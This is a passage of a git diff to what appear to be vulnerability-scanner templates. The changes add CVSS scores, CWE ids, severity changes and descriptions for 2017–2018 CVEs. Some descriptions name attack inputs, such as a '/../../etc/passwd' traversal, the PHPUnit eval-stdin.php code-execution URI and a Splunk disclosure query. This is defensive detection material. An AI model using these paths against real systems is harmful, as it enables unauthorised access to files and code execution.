cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index cbd278de96..365d6c0957 100644 --- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2017,xss,telerik description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index da92a85868..843b3c84d2 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -7,6 +7,11 @@ info: description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9288 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 30ca442da3..d97ed4f5c8 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -3,13 +3,18 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF author: pdteam - severity: high + severity: medium description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 tags: cve,cve2017,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index 0b2bfa1813..a7acef344d 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -9,6 +9,11 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html tags: cve,cve2017,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9791 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 008a0df385..3fbcb5b5e2 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -3,12 +3,17 @@ id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu - severity: critical + severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index c2ae610bf1..10a07fec84 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -7,6 +7,11 @@ info: description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) tags: cve,cve2017,dotnetnuke,bypass reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 0a1de31159..bb1e917308 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random_Robbie,pikpikcu - severity: high + severity: critical description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI tags: cve,cve2017,php,phpunit,rce reference: @@ -11,6 +11,11 @@ info: - https://github.com/RandomRobbieBF/phpunit-brute - https://thephp.cc/articles/phpunit-a-security-risk - https://twitter.com/sec715/status/1411517028012158976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9841 + cwe-id: CWE-94 requests: diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml index 0aec140f4e..2bc87caa63 100644 --- a/cves/2018/CVE-2018-0296.yaml +++ b/cves/2018/CVE-2018-0296.yaml @@ -3,9 +3,15 @@ id: CVE-2018-0296 info: name: Cisco ASA path traversal vulnerability author: organiccrap - severity: medium + severity: high tags: cve,cve2018,cisco,lfi reference: https://github.com/yassineaboukir/CVE-2018-0296 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2018-0296 + cwe-id: CWE-22 + description: "A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029." requests: - method: GET diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml index 7e1a3a440a..9fc6a43150 100644 --- a/cves/2018/CVE-2018-1000129.yaml +++ b/cves/2018/CVE-2018-1000129.yaml @@ -3,9 +3,19 @@ id: CVE-2018-1000129 info: name: Jolokia XSS author: mavericknerd,0h1in9e - severity: high + severity: medium description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser. tags: cve,cve2018,jolokia,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-1000129 + cwe-id: CWE-79 + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad + - https://access.redhat.com/errata/RHSA-2018:2669 + - https://access.redhat.com/errata/RHSA-2018:3817 requests: - method: GET diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index 961e31302a..9421966f6e 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -6,6 +6,14 @@ info: severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. tags: cve,cve2018,jolokia,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-1000130 + cwe-id: CWE-74 + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://access.redhat.com/errata/RHSA-2018:2669 requests: - raw: diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index 4591ccbbf3..7532d878ce 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -7,6 +7,11 @@ info: description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user. reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 tags: rce,git,cve,cve2018,gitlist + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000533 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index 5b5e68d0d7..b244248f80 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml @@ -7,8 +7,13 @@ info: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ author: geeknik - severity: medium + severity: high tags: cve,cve2018,jenkins,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-1000600 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index 27841387a4..5dbeddcdaa 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 tags: cve,cve2018,jenkin,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1000861 + cwe-id: CWE-502 + description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way." requests: - method: GET diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml index 99d22365ce..7c1ad45220 100644 --- a/cves/2018/CVE-2018-10095.yaml +++ b/cves/2018/CVE-2018-10095.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095 tags: cve,cve2018,xss,dolibarr + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-10095 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 0c21319c5d..fe677ff879 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 tags: globalprotect,xss,cve,cve2018,vpn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-10141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 572d3db315..d93affb5d4 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 tags: cve,cve2018,lfi,router,dlink + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-10822 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml index 3825c9357d..888187304c 100644 --- a/cves/2018/CVE-2018-11409.yaml +++ b/cves/2018/CVE-2018-11409.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 tags: cve,cve2018,splunk + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-11409 + cwe-id: CWE-200 + description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key." requests: - method: GET diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index b71a5826b6..a5c31e20e5 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -7,6 +7,11 @@ info: description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-11709 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml index edf69a2714..124b5bd839 100644 --- a/cves/2018/CVE-2018-11759.yaml +++ b/cves/2018/CVE-2018-11759.yaml @@ -3,9 +3,15 @@ id: CVE-2018-11759 info: name: Apache Tomcat JK Status Manager Access author: harshbothra_ - severity: medium + severity: high reference: https://github.com/immunIT/CVE-2018-11759 tags: cve,cve2018,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-11759 + cwe-id: CWE-22 + description: "The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical." requests: - method: GET diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index ef2fb19d90..98bff06e5c 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -3,9 +3,15 @@ id: CVE-2018-11776 info: name: Apache Struts2 S2-057 RCE author: pikpikcu - severity: critical + severity: high reference: https://github.com/jas502n/St2-057 tags: cve,cve2018,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11776 + cwe-id: CWE-20 + description: "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace." requests: - method: GET diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 65862adf48..ec8276c693 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -7,6 +7,11 @@ info: reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E severity: medium tags: tomcat,redirect,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2018-11784 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 35dcc2c5d4..f5ecf6d832 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -3,13 +3,18 @@ id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo - severity: high + severity: critical description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12031 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index b7b8cecbc5..2d01313840 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml @@ -14,6 +14,11 @@ info: https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py tags: cve,cve2018,dell,injection,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1207 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index eb04127534..202b897b33 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 tags: cve,cve2018,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2018-12095 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-1247.yaml b/cves/2018/CVE-2018-1247.yaml index bfecc86952..c040304736 100644 --- a/cves/2018/CVE-2018-1247.yaml +++ b/cves/2018/CVE-2018-1247.yaml @@ -3,8 +3,19 @@ id: CVE-2018-1247 info: name: RSA Authentication Manager XSS author: madrobot - severity: medium + severity: high tags: cve,cve2018,xss,flash + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H + cvss-score: 7.10 + cve-id: CVE-2018-1247 + cwe-id: CWE-611 + description: "RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application." + reference: + - http://seclists.org/fulldisclosure/2018/May/18 + - http://www.securitytracker.com/id/1040835 + - http://www.securityfocus.com/bid/104107 + - https://www.exploit-db.com/exploits/44634/ requests: - method: GET diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index 59af7e6d53..40bfe42ba7 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml @@ -3,9 +3,15 @@ id: CVE-2018-12613 info: name: PhpMyAdmin 4.8.1 Remote File Inclusion author: pikpikcu - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 tags: cve,cve2018,phpmyadmin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." requests: - method: GET diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index ac652812c9..ed8c7f4131 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ - severity: medium + severity: critical tags: cve,cve2018,scada,circontrol,circarlife,logs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12634 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml index 69e95546f3..52a285b05a 100644 --- a/cves/2018/CVE-2018-1271.yaml +++ b/cves/2018/CVE-2018-1271.yaml @@ -3,9 +3,15 @@ id: CVE-2018-1271 info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr - severity: high + severity: medium reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d tags: cve,cve2018,spring,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 + cve-id: CVE-2018-1271 + cwe-id: CWE-22 + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." requests: - method: GET diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index e5adf3a49d..819b07b7a6 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -13,6 +13,11 @@ info: or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 tags: cve,cve2018,vmware,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 407d1422cc..87f73ec29a 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -3,11 +3,16 @@ id: CVE-2018-1335 info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu - severity: critical + severity: high reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-1335 + description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." requests: - method: PUT diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index b0f305d163..93cc9387a3 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -3,8 +3,17 @@ id: CVE-2018-13379 info: name: FortiOS - Credentials Disclosure author: organiccrap - severity: high + severity: critical tags: cve,cve2018,fortios + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-13379 + cwe-id: CWE-22 + description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." + reference: + - https://fortiguard.com/advisory/FG-IR-18-384 + - https://www.fortiguard.com/psirt/FG-IR-20-233 requests: - method: GET diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index d8cd9eb565..96cfe5534c 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml @@ -7,6 +7,11 @@ info: description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 tags: cve,cve2018,fortios,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-13380 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index 6c5d601a6f..cee7520213 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -7,6 +7,11 @@ info: description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14013 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index ddac97cab7..f3452b953f 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml @@ -3,13 +3,18 @@ id: CVE-2018-14064 info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko - severity: high + severity: critical description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 tags: cve,cve2018,lfi,camera,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14064 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 1d95f3bd33..18f87e359a 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -3,8 +3,21 @@ id: CVE-2018-14574 info: name: Django Open Redirect author: pikpikcu - severity: low + severity: medium tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an 